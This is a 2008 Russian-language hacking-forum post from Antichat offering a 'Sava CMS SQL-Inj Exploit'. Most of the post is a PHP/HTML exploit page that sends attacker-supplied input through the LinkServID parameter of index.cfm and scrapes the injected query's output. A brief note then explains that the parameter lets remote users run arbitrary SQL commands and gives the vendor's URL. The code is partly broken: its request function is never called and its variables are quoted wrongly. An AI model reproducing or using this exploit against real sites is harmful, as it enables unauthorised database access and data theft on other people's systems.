ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Sava CMS SQL-Inj Exploit.
  #1  
Старый 25.05.2008, 12:01
Аватар для КВР
КВР
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086

Репутация: 135
По умолчанию Sava CMS SQL-Inj Exploit.

Sava CMS SQL-Inj Exploit.
PHP код:
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>Sava CMS SQL-Inj Exploit.</title>
<style type="text/css">
<!--
body {color: #EAFFC3;background-color:#615e5f;}
a:hover {color:#CC0033;}
a{color:#148044;text-decoration:none;}
a.pages{color:#FFFFFF;}
-->
</style></head>
<form name="addnews" action="" method="post">
<table border=1>
<tr>
    <td>aname:<input name="$name" type="text" value=""></td>
    <td>comand:<input name="$comand" type="text" value=""></td>
<?
// Web-Defence.ru
 
$name='';
 
$comand='';
 echo 
"<pre>\n";  
 @
set_time_limit(0);  
 @
ini_set("display_errors","0");  
 
$hostname gethostbyname('$name');  
 function 
loadfile($loadfile)  
 {  
  global 
$hostname;  
  
$responce "";  
  
$fsock    fsockopen($hostname,80,$errnum,$errstr,2);  
  
$headers  "GET http://$name/index.cfm?LinkServID=$comand&showMeta=0 HTTP/1.1\n";  
  
$headers .= "Host: $name\n";  
  
$headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";  
  
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";  
  
$headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";  
  
$headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";  
  
$headers .= "Keep-Alive: 500\n";  
  
$headers .= "Connection: close\n";  
  
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  
  
fwrite   ($fsock,$headers);  
  while    (!
feof($fsock)) $responce .= fread($fsock,1024);   
  
fclose   ($fsock);  
 
$patern "#<[\s]*sqlinj[\s]*>([^<]*)<[\s]*/sqlinj[\s]*>#i";  
 if(
preg_match($patern$responce$rez)) echo $rez[1]; else echo 'Something not right...';  
//echo $responce;  
}  
echo 
"</pre>";  
?>
Уязвимость существует из-за недостаточной обработки входных данных в параметре "LinkServID" в сценарии index.cfm. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
URL производителя: gosava.com/go/sava/

Последний раз редактировалось КВР; 25.05.2008 в 12:37..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ